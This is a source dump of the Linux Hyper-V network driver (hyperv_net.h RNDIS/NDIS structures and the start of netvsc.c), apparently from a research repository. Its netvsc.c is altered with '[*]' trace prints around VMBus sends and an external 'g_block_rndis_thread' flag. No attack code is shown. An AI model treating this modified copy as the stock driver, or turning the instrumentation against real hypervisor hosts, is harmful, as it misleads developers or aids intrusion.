777 | u32 recv_buf_gpadl_handle; 778 | u32 recv_section_cnt; 779 | u32 recv_section_size; 780 | u32 recv_completion_cnt; 781 | 782 | /* Send buffer allocated by us */ 783 | void *send_buf; 784 | u32 send_buf_gpadl_handle; 785 | u32 send_section_cnt; 786 | u32 send_section_size; 787 | unsigned long *send_section_map; 788 | 789 | /* Used for NetVSP initialization protocol */ 790 | struct completion channel_init_wait; 791 | struct nvsp_message channel_init_pkt; 792 | 793 | struct nvsp_message revoke_packet; 794 | 795 | u32 max_chn; 796 | u32 num_chn; 797 | 798 | atomic_t open_chn; 799 | struct work_struct subchan_work; 800 | wait_queue_head_t subchan_open; 801 | 802 | struct rndis_device *extension; 803 | 804 | int ring_size; 805 | 806 | u32 max_pkt; /* max number of pkt in one send, e.g. 8 */ 807 | u32 pkt_align; /* alignment bytes, e.g. 8 */ 808 | 809 | atomic_t open_cnt; 810 | 811 | struct netvsc_channel chan_table[VRSS_CHANNEL_MAX]; 812 | 813 | struct rcu_head rcu; 814 | }; 815 | 816 | /* NdisInitialize message */ 817 | struct rndis_initialize_request { 818 | u32 req_id; 819 | u32 major_ver; 820 | u32 minor_ver; 821 | u32 max_xfer_size; 822 | }; 823 | 824 | /* Response to NdisInitialize */ 825 | struct rndis_initialize_complete { 826 | u32 req_id; 827 | u32 status; 828 | u32 major_ver; 829 | u32 minor_ver; 830 | u32 dev_flags; 831 | u32 medium; 832 | u32 max_pkt_per_msg; 833 | u32 max_xfer_size; 834 | u32 pkt_alignment_factor; 835 | u32 af_list_offset; 836 | u32 af_list_size; 837 | }; 838 | 839 | /* Call manager devices only: Information about an address family */ 840 | /* supported by the device is appended to the response to NdisInitialize. */ 841 | struct rndis_co_address_family { 842 | u32 address_family; 843 | u32 major_ver; 844 | u32 minor_ver; 845 | }; 846 | 847 | /* NdisHalt message */ 848 | struct rndis_halt_request { 849 | u32 req_id; 850 | }; 851 | 852 | /* NdisQueryRequest message */ 853 | struct rndis_query_request { 854 | u32 req_id; 855 | u32 oid; 856 | u32 info_buflen; 857 | u32 info_buf_offset; 858 | u32 dev_vc_handle; 859 | }; 860 | 861 | /* Response to NdisQueryRequest */ 862 | struct rndis_query_complete { 863 | u32 req_id; 864 | u32 status; 865 | u32 info_buflen; 866 | u32 info_buf_offset; 867 | }; 868 | 869 | /* NdisSetRequest message */ 870 | struct rndis_set_request { 871 | u32 req_id; 872 | u32 oid; 873 | u32 info_buflen; 874 | u32 info_buf_offset; 875 | u32 dev_vc_handle; 876 | }; 877 | 878 | /* Response to NdisSetRequest */ 879 | struct rndis_set_complete { 880 | u32 req_id; 881 | u32 status; 882 | }; 883 | 884 | /* NdisReset message */ 885 | struct rndis_reset_request { 886 | u32 reserved; 887 | }; 888 | 889 | /* Response to NdisReset */ 890 | struct rndis_reset_complete { 891 | u32 status; 892 | u32 addressing_reset; 893 | }; 894 | 895 | /* NdisMIndicateStatus message */ 896 | struct rndis_indicate_status { 897 | u32 status; 898 | u32 status_buflen; 899 | u32 status_buf_offset; 900 | }; 901 | 902 | /* Diagnostic information passed as the status buffer in */ 903 | /* struct rndis_indicate_status messages signifying error conditions. */ 904 | struct rndis_diagnostic_info { 905 | u32 diag_status; 906 | u32 error_offset; 907 | }; 908 | 909 | /* NdisKeepAlive message */ 910 | struct rndis_keepalive_request { 911 | u32 req_id; 912 | }; 913 | 914 | /* Response to NdisKeepAlive */ 915 | struct rndis_keepalive_complete { 916 | u32 req_id; 917 | u32 status; 918 | }; 919 | 920 | /* 921 | * Data message. All Offset fields contain byte offsets from the beginning of 922 | * struct rndis_packet. All Length fields are in bytes. VcHandle is set 923 | * to 0 for connectionless data, otherwise it contains the VC handle. 924 | */ 925 | struct rndis_packet { 926 | u32 data_offset; 927 | u32 data_len; 928 | u32 oob_data_offset; 929 | u32 oob_data_len; 930 | u32 num_oob_data_elements; 931 | u32 per_pkt_info_offset; 932 | u32 per_pkt_info_len; 933 | u32 vc_handle; 934 | u32 reserved; 935 | }; 936 | 937 | /* Optional Out of Band data associated with a Data message. */ 938 | struct rndis_oobd { 939 | u32 size; 940 | u32 type; 941 | u32 class_info_offset; 942 | }; 943 | 944 | /* Packet extension field contents associated with a Data message. */ 945 | struct rndis_per_packet_info { 946 | u32 size; 947 | u32 type; 948 | u32 ppi_offset; 949 | }; 950 | 951 | enum ndis_per_pkt_info_type { 952 | TCPIP_CHKSUM_PKTINFO, 953 | IPSEC_PKTINFO, 954 | TCP_LARGESEND_PKTINFO, 955 | CLASSIFICATION_HANDLE_PKTINFO, 956 | NDIS_RESERVED, 957 | SG_LIST_PKTINFO, 958 | IEEE_8021Q_INFO, 959 | ORIGINAL_PKTINFO, 960 | PACKET_CANCEL_ID, 961 | NBL_HASH_VALUE = PACKET_CANCEL_ID, 962 | ORIGINAL_NET_BUFLIST, 963 | CACHED_NET_BUFLIST, 964 | SHORT_PKT_PADINFO, 965 | MAX_PER_PKT_INFO 966 | }; 967 | 968 | struct ndis_pkt_8021q_info { 969 | union { 970 | struct { 971 | u32 pri:3; /* User Priority */ 972 | u32 cfi:1; /* Canonical Format ID */ 973 | u32 vlanid:12; /* VLAN ID */ 974 | u32 reserved:16; 975 | }; 976 | u32 value; 977 | }; 978 | }; 979 | 980 | struct ndis_object_header { 981 | u8 type; 982 | u8 revision; 983 | u16 size; 984 | }; 985 | 986 | #define NDIS_OBJECT_TYPE_DEFAULT 0x80 987 | #define NDIS_OFFLOAD_PARAMETERS_REVISION_3 3 988 | #define NDIS_OFFLOAD_PARAMETERS_REVISION_2 2 989 | #define NDIS_OFFLOAD_PARAMETERS_REVISION_1 1 990 | 991 | #define NDIS_OFFLOAD_PARAMETERS_NO_CHANGE 0 992 | #define NDIS_OFFLOAD_PARAMETERS_LSOV2_DISABLED 1 993 | #define NDIS_OFFLOAD_PARAMETERS_LSOV2_ENABLED 2 994 | #define NDIS_OFFLOAD_PARAMETERS_LSOV1_ENABLED 2 995 | #define NDIS_OFFLOAD_PARAMETERS_RSC_DISABLED 1 996 | #define NDIS_OFFLOAD_PARAMETERS_RSC_ENABLED 2 997 | #define NDIS_OFFLOAD_PARAMETERS_TX_RX_DISABLED 1 998 | #define NDIS_OFFLOAD_PARAMETERS_TX_ENABLED_RX_DISABLED 2 999 | #define NDIS_OFFLOAD_PARAMETERS_RX_ENABLED_TX_DISABLED 3 1000 | #define NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED 4 1001 | 1002 | #define NDIS_TCP_LARGE_SEND_OFFLOAD_V2_TYPE 1 1003 | #define NDIS_TCP_LARGE_SEND_OFFLOAD_IPV4 0 1004 | #define NDIS_TCP_LARGE_SEND_OFFLOAD_IPV6 1 1005 | 1006 | #define VERSION_4_OFFLOAD_SIZE 22 1007 | /* 1008 | * New offload OIDs for NDIS 6 1009 | */ 1010 | #define OID_TCP_OFFLOAD_CURRENT_CONFIG 0xFC01020B /* query only */ 1011 | #define OID_TCP_OFFLOAD_PARAMETERS 0xFC01020C /* set only */ 1012 | #define OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES 0xFC01020D/* query only */ 1013 | #define OID_TCP_CONNECTION_OFFLOAD_CURRENT_CONFIG 0xFC01020E /* query only */ 1014 | #define OID_TCP_CONNECTION_OFFLOAD_HARDWARE_CAPABILITIES 0xFC01020F /* query */ 1015 | #define OID_OFFLOAD_ENCAPSULATION 0x0101010A /* set/query */ 1016 | 1017 | /* 1018 | * OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES 1019 | * ndis_type: NDIS_OBJTYPE_OFFLOAD 1020 | */ 1021 | 1022 | #define NDIS_OFFLOAD_ENCAP_NONE 0x0000 1023 | #define NDIS_OFFLOAD_ENCAP_NULL 0x0001 1024 | #define NDIS_OFFLOAD_ENCAP_8023 0x0002 1025 | #define NDIS_OFFLOAD_ENCAP_8023PQ 0x0004 1026 | #define NDIS_OFFLOAD_ENCAP_8023PQ_OOB 0x0008 1027 | #define NDIS_OFFLOAD_ENCAP_RFC1483 0x0010 1028 | 1029 | struct ndis_csum_offload { 1030 | u32 ip4_txenc; 1031 | u32 ip4_txcsum; 1032 | #define NDIS_TXCSUM_CAP_IP4OPT 0x001 1033 | #define NDIS_TXCSUM_CAP_TCP4OPT 0x004 1034 | #define NDIS_TXCSUM_CAP_TCP4 0x010 1035 | #define NDIS_TXCSUM_CAP_UDP4 0x040 1036 | #define NDIS_TXCSUM_CAP_IP4 0x100 1037 | 1038 | #define NDIS_TXCSUM_ALL_TCP4 (NDIS_TXCSUM_CAP_TCP4 | NDIS_TXCSUM_CAP_TCP4OPT) 1039 | 1040 | u32 ip4_rxenc; 1041 | u32 ip4_rxcsum; 1042 | #define NDIS_RXCSUM_CAP_IP4OPT 0x001 1043 | #define NDIS_RXCSUM_CAP_TCP4OPT 0x004 1044 | #define NDIS_RXCSUM_CAP_TCP4 0x010 1045 | #define NDIS_RXCSUM_CAP_UDP4 0x040 1046 | #define NDIS_RXCSUM_CAP_IP4 0x100 1047 | u32 ip6_txenc; 1048 | u32 ip6_txcsum; 1049 | #define NDIS_TXCSUM_CAP_IP6EXT 0x001 1050 | #define NDIS_TXCSUM_CAP_TCP6OPT 0x004 1051 | #define NDIS_TXCSUM_CAP_TCP6 0x010 1052 | #define NDIS_TXCSUM_CAP_UDP6 0x040 1053 | u32 ip6_rxenc; 1054 | u32 ip6_rxcsum; 1055 | #define NDIS_RXCSUM_CAP_IP6EXT 0x001 1056 | #define NDIS_RXCSUM_CAP_TCP6OPT 0x004 1057 | #define NDIS_RXCSUM_CAP_TCP6 0x010 1058 | #define NDIS_RXCSUM_CAP_UDP6 0x040 1059 | 1060 | #define NDIS_TXCSUM_ALL_TCP6 (NDIS_TXCSUM_CAP_TCP6 | \ 1061 | NDIS_TXCSUM_CAP_TCP6OPT | \ 1062 | NDIS_TXCSUM_CAP_IP6EXT) 1063 | }; 1064 | 1065 | struct ndis_lsov1_offload { 1066 | u32 encap; 1067 | u32 maxsize; 1068 | u32 minsegs; 1069 | u32 opts; 1070 | }; 1071 | 1072 | struct ndis_ipsecv1_offload { 1073 | u32 encap; 1074 | u32 ah_esp; 1075 | u32 xport_tun; 1076 | u32 ip4_opts; 1077 | u32 flags; 1078 | u32 ip4_ah; 1079 | u32 ip4_esp; 1080 | }; 1081 | 1082 | struct ndis_lsov2_offload { 1083 | u32 ip4_encap; 1084 | u32 ip4_maxsz; 1085 | u32 ip4_minsg; 1086 | u32 ip6_encap; 1087 | u32 ip6_maxsz; 1088 | u32 ip6_minsg; 1089 | u32 ip6_opts; 1090 | #define NDIS_LSOV2_CAP_IP6EXT 0x001 1091 | #define NDIS_LSOV2_CAP_TCP6OPT 0x004 1092 | 1093 | #define NDIS_LSOV2_CAP_IP6 (NDIS_LSOV2_CAP_IP6EXT | \ 1094 | NDIS_LSOV2_CAP_TCP6OPT) 1095 | }; 1096 | 1097 | struct ndis_ipsecv2_offload { 1098 | u32 encap; 1099 | u16 ip6; 1100 | u16 ip4opt; 1101 | u16 ip6ext; 1102 | u16 ah; 1103 | u16 esp; 1104 | u16 ah_esp; 1105 | u16 xport; 1106 | u16 tun; 1107 | u16 xport_tun; 1108 | u16 lso; 1109 | u16 extseq; 1110 | u32 udp_esp; 1111 | u32 auth; 1112 | u32 crypto; 1113 | u32 sa_caps; 1114 | }; 1115 | 1116 | struct ndis_rsc_offload { 1117 | u16 ip4; 1118 | u16 ip6; 1119 | }; 1120 | 1121 | struct ndis_encap_offload { 1122 | u32 flags; 1123 | u32 maxhdr; 1124 | }; 1125 | 1126 | struct ndis_offload { 1127 | struct ndis_object_header header; 1128 | struct ndis_csum_offload csum; 1129 | struct ndis_lsov1_offload lsov1; 1130 | struct ndis_ipsecv1_offload ipsecv1; 1131 | struct ndis_lsov2_offload lsov2; 1132 | u32 flags; 1133 | /* NDIS >= 6.1 */ 1134 | struct ndis_ipsecv2_offload ipsecv2; 1135 | /* NDIS >= 6.30 */ 1136 | struct ndis_rsc_offload rsc; 1137 | struct ndis_encap_offload encap_gre; 1138 | }; 1139 | 1140 | #define NDIS_OFFLOAD_SIZE sizeof(struct ndis_offload) 1141 | #define NDIS_OFFLOAD_SIZE_6_0 offsetof(struct ndis_offload, ipsecv2) 1142 | #define NDIS_OFFLOAD_SIZE_6_1 offsetof(struct ndis_offload, rsc) 1143 | 1144 | struct ndis_offload_params { 1145 | struct ndis_object_header header; 1146 | u8 ip_v4_csum; 1147 | u8 tcp_ip_v4_csum; 1148 | u8 udp_ip_v4_csum; 1149 | u8 tcp_ip_v6_csum; 1150 | u8 udp_ip_v6_csum; 1151 | u8 lso_v1; 1152 | u8 ip_sec_v1; 1153 | u8 lso_v2_ipv4; 1154 | u8 lso_v2_ipv6; 1155 | u8 tcp_connection_ip_v4; 1156 | u8 tcp_connection_ip_v6; 1157 | u32 flags; 1158 | u8 ip_sec_v2; 1159 | u8 ip_sec_v2_ip_v4; 1160 | struct { 1161 | u8 rsc_ip_v4; 1162 | u8 rsc_ip_v6; 1163 | }; 1164 | struct { 1165 | u8 encapsulated_packet_task_offload; 1166 | u8 encapsulation_types; 1167 | }; 1168 | }; 1169 | 1170 | struct ndis_tcp_ip_checksum_info { 1171 | union { 1172 | struct { 1173 | u32 is_ipv4:1; 1174 | u32 is_ipv6:1; 1175 | u32 tcp_checksum:1; 1176 | u32 udp_checksum:1; 1177 | u32 ip_header_checksum:1; 1178 | u32 reserved:11; 1179 | u32 tcp_header_offset:10; 1180 | } transmit; 1181 | struct { 1182 | u32 tcp_checksum_failed:1; 1183 | u32 udp_checksum_failed:1; 1184 | u32 ip_checksum_failed:1; 1185 | u32 tcp_checksum_succeeded:1; 1186 | u32 udp_checksum_succeeded:1; 1187 | u32 ip_checksum_succeeded:1; 1188 | u32 loopback:1; 1189 | u32 tcp_checksum_value_invalid:1; 1190 | u32 ip_checksum_value_invalid:1; 1191 | } receive; 1192 | u32 value; 1193 | }; 1194 | }; 1195 | 1196 | struct ndis_tcp_lso_info { 1197 | union { 1198 | struct { 1199 | u32 unused:30; 1200 | u32 type:1; 1201 | u32 reserved2:1; 1202 | } transmit; 1203 | struct { 1204 | u32 mss:20; 1205 | u32 tcp_header_offset:10; 1206 | u32 type:1; 1207 | u32 reserved2:1; 1208 | } lso_v1_transmit; 1209 | struct { 1210 | u32 tcp_payload:30; 1211 | u32 type:1; 1212 | u32 reserved2:1; 1213 | } lso_v1_transmit_complete; 1214 | struct { 1215 | u32 mss:20; 1216 | u32 tcp_header_offset:10; 1217 | u32 type:1; 1218 | u32 ip_version:1; 1219 | } lso_v2_transmit; 1220 | struct { 1221 | u32 reserved:30; 1222 | u32 type:1; 1223 | u32 reserved2:1; 1224 | } lso_v2_transmit_complete; 1225 | u32 value; 1226 | }; 1227 | }; 1228 | 1229 | #define NDIS_VLAN_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1230 | sizeof(struct ndis_pkt_8021q_info)) 1231 | 1232 | #define NDIS_CSUM_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1233 | sizeof(struct ndis_tcp_ip_checksum_info)) 1234 | 1235 | #define NDIS_LSO_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1236 | sizeof(struct ndis_tcp_lso_info)) 1237 | 1238 | #define NDIS_HASH_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1239 | sizeof(u32)) 1240 | 1241 | /* Total size of all PPI data */ 1242 | #define NDIS_ALL_PPI_SIZE (NDIS_VLAN_PPI_SIZE + NDIS_CSUM_PPI_SIZE + \ 1243 | NDIS_LSO_PPI_SIZE + NDIS_HASH_PPI_SIZE) 1244 | 1245 | /* Format of Information buffer passed in a SetRequest for the OID */ 1246 | /* OID_GEN_RNDIS_CONFIG_PARAMETER. */ 1247 | struct rndis_config_parameter_info { 1248 | u32 parameter_name_offset; 1249 | u32 parameter_name_length; 1250 | u32 parameter_type; 1251 | u32 parameter_value_offset; 1252 | u32 parameter_value_length; 1253 | }; 1254 | 1255 | /* Values for ParameterType in struct rndis_config_parameter_info */ 1256 | #define RNDIS_CONFIG_PARAM_TYPE_INTEGER 0 1257 | #define RNDIS_CONFIG_PARAM_TYPE_STRING 2 1258 | 1259 | /* CONDIS Miniport messages for connection oriented devices */ 1260 | /* that do not implement a call manager. */ 1261 | 1262 | /* CoNdisMiniportCreateVc message */ 1263 | struct rcondis_mp_create_vc { 1264 | u32 req_id; 1265 | u32 ndis_vc_handle; 1266 | }; 1267 | 1268 | /* Response to CoNdisMiniportCreateVc */ 1269 | struct rcondis_mp_create_vc_complete { 1270 | u32 req_id; 1271 | u32 dev_vc_handle; 1272 | u32 status; 1273 | }; 1274 | 1275 | /* CoNdisMiniportDeleteVc message */ 1276 | struct rcondis_mp_delete_vc { 1277 | u32 req_id; 1278 | u32 dev_vc_handle; 1279 | }; 1280 | 1281 | /* Response to CoNdisMiniportDeleteVc */ 1282 | struct rcondis_mp_delete_vc_complete { 1283 | u32 req_id; 1284 | u32 status; 1285 | }; 1286 | 1287 | /* CoNdisMiniportQueryRequest message */ 1288 | struct rcondis_mp_query_request { 1289 | u32 req_id; 1290 | u32 request_type; 1291 | u32 oid; 1292 | u32 dev_vc_handle; 1293 | u32 info_buflen; 1294 | u32 info_buf_offset; 1295 | }; 1296 | 1297 | /* CoNdisMiniportSetRequest message */ 1298 | struct rcondis_mp_set_request { 1299 | u32 req_id; 1300 | u32 request_type; 1301 | u32 oid; 1302 | u32 dev_vc_handle; 1303 | u32 info_buflen; 1304 | u32 info_buf_offset; 1305 | }; 1306 | 1307 | /* CoNdisIndicateStatus message */ 1308 | struct rcondis_indicate_status { 1309 | u32 ndis_vc_handle; 1310 | u32 status; 1311 | u32 status_buflen; 1312 | u32 status_buf_offset; 1313 | }; 1314 | 1315 | /* CONDIS Call/VC parameters */ 1316 | struct rcondis_specific_parameters { 1317 | u32 parameter_type; 1318 | u32 parameter_length; 1319 | u32 parameter_lffset; 1320 | }; 1321 | 1322 | struct rcondis_media_parameters { 1323 | u32 flags; 1324 | u32 reserved1; 1325 | u32 reserved2; 1326 | struct rcondis_specific_parameters media_specific; 1327 | }; 1328 | 1329 | struct rndis_flowspec { 1330 | u32 token_rate; 1331 | u32 token_bucket_size; 1332 | u32 peak_bandwidth; 1333 | u32 latency; 1334 | u32 delay_variation; 1335 | u32 service_type; 1336 | u32 max_sdu_size; 1337 | u32 minimum_policed_size; 1338 | }; 1339 | 1340 | struct rcondis_call_manager_parameters { 1341 | struct rndis_flowspec transmit; 1342 | struct rndis_flowspec receive; 1343 | struct rcondis_specific_parameters call_mgr_specific; 1344 | }; 1345 | 1346 | /* CoNdisMiniportActivateVc message */ 1347 | struct rcondis_mp_activate_vc_request { 1348 | u32 req_id; 1349 | u32 flags; 1350 | u32 dev_vc_handle; 1351 | u32 media_params_offset; 1352 | u32 media_params_length; 1353 | u32 call_mgr_params_offset; 1354 | u32 call_mgr_params_length; 1355 | }; 1356 | 1357 | /* Response to CoNdisMiniportActivateVc */ 1358 | struct rcondis_mp_activate_vc_complete { 1359 | u32 req_id; 1360 | u32 status; 1361 | }; 1362 | 1363 | /* CoNdisMiniportDeactivateVc message */ 1364 | struct rcondis_mp_deactivate_vc_request { 1365 | u32 req_id; 1366 | u32 flags; 1367 | u32 dev_vc_handle; 1368 | }; 1369 | 1370 | /* Response to CoNdisMiniportDeactivateVc */ 1371 | struct rcondis_mp_deactivate_vc_complete { 1372 | u32 req_id; 1373 | u32 status; 1374 | }; 1375 | 1376 | 1377 | /* union with all of the RNDIS messages */ 1378 | union rndis_message_container { 1379 | struct rndis_packet pkt; 1380 | struct rndis_initialize_request init_req; 1381 | struct rndis_halt_request halt_req; 1382 | struct rndis_query_request query_req; 1383 | struct rndis_set_request set_req; 1384 | struct rndis_reset_request reset_req; 1385 | struct rndis_keepalive_request keep_alive_req; 1386 | struct rndis_indicate_status indicate_status; 1387 | struct rndis_initialize_complete init_complete; 1388 | struct rndis_query_complete query_complete; 1389 | struct rndis_set_complete set_complete; 1390 | struct rndis_reset_complete reset_complete; 1391 | struct rndis_keepalive_complete keep_alive_complete; 1392 | struct rcondis_mp_create_vc co_miniport_create_vc; 1393 | struct rcondis_mp_delete_vc co_miniport_delete_vc; 1394 | struct rcondis_indicate_status co_indicate_status; 1395 | struct rcondis_mp_activate_vc_request co_miniport_activate_vc; 1396 | struct rcondis_mp_deactivate_vc_request co_miniport_deactivate_vc; 1397 | struct rcondis_mp_create_vc_complete co_miniport_create_vc_complete; 1398 | struct rcondis_mp_delete_vc_complete co_miniport_delete_vc_complete; 1399 | struct rcondis_mp_activate_vc_complete co_miniport_activate_vc_complete; 1400 | struct rcondis_mp_deactivate_vc_complete 1401 | co_miniport_deactivate_vc_complete; 1402 | }; 1403 | 1404 | /* Remote NDIS message format */ 1405 | struct rndis_message { 1406 | u32 ndis_msg_type; 1407 | 1408 | /* Total length of this message, from the beginning */ 1409 | /* of the struct rndis_message, in bytes. */ 1410 | u32 msg_len; 1411 | 1412 | /* Actual message */ 1413 | union rndis_message_container msg; 1414 | }; 1415 | 1416 | 1417 | /* Handy macros */ 1418 | 1419 | /* get the size of an RNDIS message. Pass in the message type, */ 1420 | /* struct rndis_set_request, struct rndis_packet for example */ 1421 | #define RNDIS_MESSAGE_SIZE(msg) \ 1422 | (sizeof(msg) + (sizeof(struct rndis_message) - \ 1423 | sizeof(union rndis_message_container))) 1424 | 1425 | /* get pointer to info buffer with message pointer */ 1426 | #define MESSAGE_TO_INFO_BUFFER(msg) \ 1427 | (((unsigned char *)(msg)) + msg->info_buf_offset) 1428 | 1429 | /* get pointer to status buffer with message pointer */ 1430 | #define MESSAGE_TO_STATUS_BUFFER(msg) \ 1431 | (((unsigned char *)(msg)) + msg->status_buf_offset) 1432 | 1433 | /* get pointer to OOBD buffer with message pointer */ 1434 | #define MESSAGE_TO_OOBD_BUFFER(msg) \ 1435 | (((unsigned char *)(msg)) + msg->oob_data_offset) 1436 | 1437 | /* get pointer to data buffer with message pointer */ 1438 | #define MESSAGE_TO_DATA_BUFFER(msg) \ 1439 | (((unsigned char *)(msg)) + msg->per_pkt_info_offset) 1440 | 1441 | /* get pointer to contained message from NDIS_MESSAGE pointer */ 1442 | #define RNDIS_MESSAGE_PTR_TO_MESSAGE_PTR(rndis_msg) \ 1443 | ((void *) &rndis_msg->msg) 1444 | 1445 | /* get pointer to contained message from NDIS_MESSAGE pointer */ 1446 | #define RNDIS_MESSAGE_RAW_PTR_TO_MESSAGE_PTR(rndis_msg) \ 1447 | ((void *) rndis_msg) 1448 | 1449 | 1450 | 1451 | #define RNDIS_HEADER_SIZE (sizeof(struct rndis_message) - \ 1452 | sizeof(union rndis_message_container)) 1453 | 1454 | #define RNDIS_AND_PPI_SIZE (sizeof(struct rndis_message) + NDIS_ALL_PPI_SIZE) 1455 | 1456 | #define NDIS_PACKET_TYPE_DIRECTED 0x00000001 1457 | #define NDIS_PACKET_TYPE_MULTICAST 0x00000002 1458 | #define NDIS_PACKET_TYPE_ALL_MULTICAST 0x00000004 1459 | #define NDIS_PACKET_TYPE_BROADCAST 0x00000008 1460 | #define NDIS_PACKET_TYPE_SOURCE_ROUTING 0x00000010 1461 | #define NDIS_PACKET_TYPE_PROMISCUOUS 0x00000020 1462 | #define NDIS_PACKET_TYPE_SMT 0x00000040 1463 | #define NDIS_PACKET_TYPE_ALL_LOCAL 0x00000080 1464 | #define NDIS_PACKET_TYPE_GROUP 0x00000100 1465 | #define NDIS_PACKET_TYPE_ALL_FUNCTIONAL 0x00000200 1466 | #define NDIS_PACKET_TYPE_FUNCTIONAL 0x00000400 1467 | #define NDIS_PACKET_TYPE_MAC_FRAME 0x00000800 1468 | 1469 | #define TRANSPORT_INFO_NOT_IP 0 1470 | #define TRANSPORT_INFO_IPV4_TCP 0x01 1471 | #define TRANSPORT_INFO_IPV4_UDP 0x02 1472 | #define TRANSPORT_INFO_IPV6_TCP 0x10 1473 | #define TRANSPORT_INFO_IPV6_UDP 0x20 1474 | 1475 | long netvsc_ioctl(struct file *filp, 1476 | unsigned int cmd, 1477 | unsigned long arg); 1478 | 1479 | #define RNDIS_EXT_LEN PAGE_SIZE 1480 | 1481 | 1482 | struct rndis_request { 1483 | struct list_head list_ent; 1484 | struct completion wait_event; 1485 | 1486 | struct rndis_message response_msg; 1487 | /* 1488 | * The buffer for extended info after the RNDIS response message. It's 1489 | * referenced based on the data offset in the RNDIS message. Its size 1490 | * is enough for current needs, and should be sufficient for the near 1491 | * future. 1492 | */ 1493 | u8 response_ext[RNDIS_EXT_LEN]; 1494 | 1495 | /* Simplify allocation by having a netvsc packet inline */ 1496 | struct hv_netvsc_packet pkt; 1497 | 1498 | struct rndis_message request_msg; 1499 | /* 1500 | * The buffer for the extended info after the RNDIS request message. 1501 | * It is referenced and sized in a similar way as response_ext. 1502 | */ 1503 | u8 request_ext[RNDIS_EXT_LEN]; 1504 | }; 1505 | 1506 | #endif /* _HYPERV_NET_H */ 1507 | -------------------------------------------------------------------------------- /ring0/hyperv/modules.order: -------------------------------------------------------------------------------- 1 | kernel/drivers/net/hyperv/hv_netvsc.ko 2 | -------------------------------------------------------------------------------- /ring0/hyperv/netvsc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Microsoft Corporation. 3 | * 4 | * This program is free software; you can redistribute it and/or modify it 5 | * under the terms and conditions of the GNU General Public License, 6 | * version 2, as published by the Free Software Foundation. 7 | * 8 | * This program is distributed in the hope it will be useful, but WITHOUT 9 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 10 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 11 | * more details. 12 | * 13 | * You should have received a copy of the GNU General Public License along with 14 | * this program; if not, see . 15 | * 16 | * Authors: 17 | * Haiyang Zhang 18 | * Hank Janssen 19 | */ 20 | #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #include 36 | 37 | #include "hyperv_net.h" 38 | 39 | extern bool g_block_rndis_thread; 40 | 41 | 42 | static struct hv_device *netvsc_channel_to_device(struct vmbus_channel *channel); 43 | /* 44 | * Switch the data path from the synthetic interface to the VF 45 | * interface. 46 | */ 47 | void netvsc_switch_datapath(struct net_device *ndev, bool vf) 48 | { 49 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 50 | struct hv_device *dev = net_device_ctx->device_ctx; 51 | struct netvsc_device *nv_dev = rtnl_dereference(net_device_ctx->nvdev); 52 | struct nvsp_message *init_pkt = &nv_dev->channel_init_pkt; 53 | 54 | memset(init_pkt, 0, sizeof(struct nvsp_message)); 55 | init_pkt->hdr.msg_type = NVSP_MSG4_TYPE_SWITCH_DATA_PATH; 56 | if (vf) 57 | init_pkt->msg.v4_msg.active_dp.active_datapath = 58 | NVSP_DATAPATH_VF; 59 | else 60 | init_pkt->msg.v4_msg.active_dp.active_datapath = 61 | NVSP_DATAPATH_SYNTHETIC; 62 | 63 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG4_TYPE_SWITCH_DATA_PATH\n"); 64 | vmbus_sendpacket(dev->channel, init_pkt, 65 | sizeof(struct nvsp_message), 66 | (unsigned long)init_pkt, 67 | VM_PKT_DATA_INBAND, 0); 68 | } 69 | 70 | static struct netvsc_device *alloc_net_device(void) 71 | { 72 | struct netvsc_device *net_device; 73 | 74 | net_device = kzalloc(sizeof(struct netvsc_device), GFP_KERNEL); 75 | if (!net_device) 76 | return NULL; 77 | 78 | init_waitqueue_head(&net_device->wait_drain); 79 | net_device->destroy = false; 80 | atomic_set(&net_device->open_cnt, 0); 81 | net_device->max_pkt = RNDIS_MAX_PKT_DEFAULT; 82 | net_device->pkt_align = RNDIS_PKT_ALIGN_DEFAULT; 83 | 84 | init_completion(&net_device->channel_init_wait); 85 | init_waitqueue_head(&net_device->subchan_open); 86 | INIT_WORK(&net_device->subchan_work, rndis_set_subchannel); 87 | 88 | return net_device; 89 | } 90 | 91 | static void free_netvsc_device(struct rcu_head *head) 92 | { 93 | struct netvsc_device *nvdev 94 | = container_of(head, struct netvsc_device, rcu); 95 | int i; 96 | 97 | for (i = 0; i < VRSS_CHANNEL_MAX; i++) 98 | vfree(nvdev->chan_table[i].mrc.slots); 99 | 100 | kfree(nvdev); 101 | } 102 | 103 | static void free_netvsc_device_rcu(struct netvsc_device *nvdev) 104 | { 105 | call_rcu(&nvdev->rcu, free_netvsc_device); 106 | } 107 | 108 | static void netvsc_destroy_buf(struct hv_device *device) 109 | { 110 | struct nvsp_message *revoke_packet; 111 | struct net_device *ndev = hv_get_drvdata(device); 112 | struct net_device_context *ndc = netdev_priv(ndev); 113 | struct netvsc_device *net_device = rtnl_dereference(ndc->nvdev); 114 | int ret; 115 | 116 | /* 117 | * If we got a section count, it means we received a 118 | * SendReceiveBufferComplete msg (ie sent 119 | * NvspMessage1TypeSendReceiveBuffer msg) therefore, we need 120 | * to send a revoke msg here 121 | */ 122 | if (net_device->recv_section_cnt) { 123 | /* Send the revoke receive buffer */ 124 | revoke_packet = &net_device->revoke_packet; 125 | memset(revoke_packet, 0, sizeof(struct nvsp_message)); 126 | 127 | revoke_packet->hdr.msg_type = 128 | NVSP_MSG1_TYPE_REVOKE_RECV_BUF; 129 | revoke_packet->msg.v1_msg. 130 | revoke_recv_buf.id = NETVSC_RECEIVE_BUFFER_ID; 131 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_REVOKE_RECV_BUF\n"); 132 | ret = vmbus_sendpacket(device->channel, 133 | revoke_packet, 134 | sizeof(struct nvsp_message), 135 | (unsigned long)revoke_packet, 136 | 